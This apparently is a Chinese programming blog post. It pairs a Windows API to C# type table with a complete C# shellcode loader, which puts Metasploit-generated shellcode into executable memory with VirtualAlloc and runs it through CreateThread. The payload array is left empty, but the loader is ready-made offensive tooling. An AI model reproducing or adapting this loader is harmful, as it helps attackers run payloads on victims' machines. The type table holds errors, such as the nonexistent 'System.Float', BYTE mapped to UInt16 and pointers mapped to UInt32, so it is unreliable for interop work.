看点代码安抚浮躁的心
API数据类型 | Windows API时的数据类型 |
---|---|
BOOL | System.Int32 |
BOOLEAN | System.Int32 |
BYTE | System.UInt16 |
COLORREF | System.UInt32 |
DWORD | System.UInt32 |
DWORD32 | System.UInt32 |
DWORD64 | System.UInt64 |
FLOAT | System.Float |
HACCEL | System.IntPtr |
HANDLE | System.IntPtr |
HBITMAP | System.IntPtr |
HBRUSH | System.IntPtr |
HCONV | System.IntPtr |
HCONVLIST | System.IntPtr |
HCURSOR | System.IntPtr |
HDC | System.IntPtr |
HDDEDATA | System.IntPtr |
HDESK | System.IntPtr |
HDROP | System.IntPtr |
HDWP | System.IntPtr |
HENHMETAFILE | System.IntPtr |
HFILE | System.IntPtr |
HFONT | System.IntPtr |
HGDIOBJ | System.IntPtr |
HGLOBAL | System.IntPtr |
HHOOK | System.IntPtr |
HICON | System.IntPtr |
HIMAGELIST | System.IntPtr |
HIMC | System.IntPtr |
HINSTANCE | System.IntPtr |
HKEY | System.IntPtr |
HLOCAL | System.IntPtr |
HMENU | System.IntPtr |
HMETAFILE | System.IntPtr |
HMODULE | System.IntPtr |
HMONITOR | System.IntPtr |
HPALETTE | System.IntPtr |
HPEN | System.IntPtr |
HRGN | System.IntPtr |
HRSRC | System.IntPtr |
HSZ | System.IntPtr |
HWINSTA | System.IntPtr |
HWND | System.IntPtr |
INT | System.Int32 |
INT32 | System.Int32 |
INT64 | System.Int64 |
LONG | System.Int32 |
LONG32 | System.Int32 |
LONG64 | System.Int64 |
LONGLONG | System.Int64 |
LPARAM | System.IntPtr |
LPBOOL | System.Int16[] |
LPBYTE | System.UInt16[] |
LPCOLORREF | System.UInt32[] |
LPCSTR | System.String |
LPCTSTR | System.String |
LPCVOID | System.UInt32 |
LPCWSTR | System.String |
LPDWORD | System.UInt32[] |
LPHANDLE | System.UInt32 |
LPINT | System.Int32[] |
LPLONG | System.Int32[] |
LPSTR | System.String |
LPTSTR | System.String |
LPVOID | System.UInt32 |
LPWORD | System.Int32[] |
LPWSTR | System.String |
LRESULT | System.IntPtr |
PBOOL | System.Int16[] |
PBOOLEAN | System.Int16[] |
PBYTE | System.UInt16[] |
PCHAR | System.Char[] |
PCSTR | System.String |
PCTSTR | System.String |
PCWCH | System.UInt32 |
PCWSTR | System.UInt32 |
PDWORD | System.Int32[] |
PFLOAT | System.Float[] |
PHANDLE | System.UInt32 |
PHKEY | System.UInt32 |
PINT | System.Int32[] |
PLCID | System.UInt32 |
PLONG | System.Int32[] |
PLUID | System.UInt32 |
PSHORT | System.Int16[] |
PSTR | System.String |
PTBYTE | System.Char[] |
PTCHAR | System.Char[] |
PTSTR | System.String |
PUCHAR | System.Char[] |
PUINT | System.UInt32[] |
PULONG | System.UInt32[] |
PUSHORT | System.UInt16[] |
PVOID | System.UInt32 |
PWCHAR | System.Char[] |
PWORD | System.Int16[] |
PWSTR | System.String |
REGSAM | System.UInt32 |
SC_HANDLE | System.IntPtr |
SC_LOCK | System.IntPtr |
SHORT | System.Int16 |
SIZE_T | System.UInt32 |
SSIZE_ | System.UInt32 |
TBYTE | System.Char |
TCHAR | System.Char |
UCHAR | System.Byte |
UINT | System.UInt32 |
UINT32 | System.UInt32 |
UINT64 | System.UInt64 |
ULONG | System.UInt32 |
ULONG32 | System.UInt32 |
ULONG64 | System.UInt64 |
ULONGLONG | System.UInt64 |
USHORT | System.UInt16 |
WORD | System.UInt16 |
WPARAM | System.IntPtr |
LPTHREAD_START_ROUTINE | UInt32 |
LPSECURITY_ATTRIBUTES | LPSECURITY_ATTRIBUTES |
[DllImport("kernel32", EntryPoint = "VirtualAlloc")] //导入kernel32.dll,VirtualAlloc函数
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);//声明win32 API函数
...
//调用
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);
//或者可以写成这样
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
extern 修饰符用于声明在外部实现的方法。 extern 修饰符的常见用法是在使用 Interop 服务调入非托管代码时与 DllImport 特性一起使用。在这种情况下,还必须将方法声明为 static
完整代码
static void Main(string[] args)
{
// native function’s compiled code
// generated with metasploit
byte[] shellcode = new byte[892] { };
//UInt32 funcAddr= VirtualAlloc(0, (uint)shellcode.Length,);
//CreateThread(0,0, funcAddr,);
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}
}